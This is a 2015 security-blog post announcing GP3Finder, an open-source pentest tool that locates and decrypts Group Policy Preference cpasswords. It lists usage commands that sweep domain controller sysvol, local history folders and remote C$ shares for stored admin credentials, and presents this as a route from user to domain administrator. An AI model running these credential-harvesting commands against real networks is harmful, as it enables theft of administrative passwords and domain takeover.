Published on December 28th, 2015 | by MaxiSoler0
Group Policy Preferences Password Finder (GP3Finder) v4.0
Group Policy Preferences Password Finder (GP3Finder) searches for and decrypts passwords stored in Group Policy Preference items on sysvol of the domain controller, local host, or any specified share of a remote host. Also allows decryption of manually retrieved cpassword.
Preference items have been seen to commonly configure administrative account details, therefore this tool can often allow quick privilege escalation from user to domain administrator.
Note MS14-025 prevents new preference items being created with credentials, but does not delete existing items.
Group Policy preferences were introduced by Microsoft in Windows 2008 allowing administrators to configure unmanaged settings (settings which the user can change) from a centrally managed location – Group Policy Objects (GPO).
GP3Finder has been released open source under the GPL2 license.
This tool requires the following:
- PyWin32 (if running on Windows)
- Decrypt a given cpassword:
gp3finder.py -D CPASSWORD
The following commands output decrypted cpasswords (from Groups.xml etc) and list of xml files that contain the word ‘password’ (for manual review) to file (‘gp3finder.out’ by default, this can be changed with -o FILE).
- Find and decrypt cpasswords on domain controller automatically:
gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER Password: PASSWORD
Maps DOMAIN_CONTROLLER’s sysvol share with given credentials.
- Find and decrypt cpasswords on the local machine automatically:
gp3finder.py -A -l
Searches through “C:ProgramDataMicrosoftGroup PolicyHistory” (by default) this can be changed with -lr PATH
- Find and decrypt cpasswords on a remote host:
gp3finder.py -A -t HOST -u DOMAINUSER -s C$ -rr "ProgramDataMicrosoftGroup PolicyHistory"
- Find and decrypt cpasswords on hosts specified in a file (one per line):
gp3finder.py -A -f HOST_FILE -u DOMAINUSER -s C$ -rr "ProgramDataMicrosoftGroup PolicyHistory"
Note: the user this script is run as must have permission to map/mount shares if running against a remote host.
Additional Options: –help
More Information: here
Thanks to Oliver Morton, for sharing this tool with us. 😉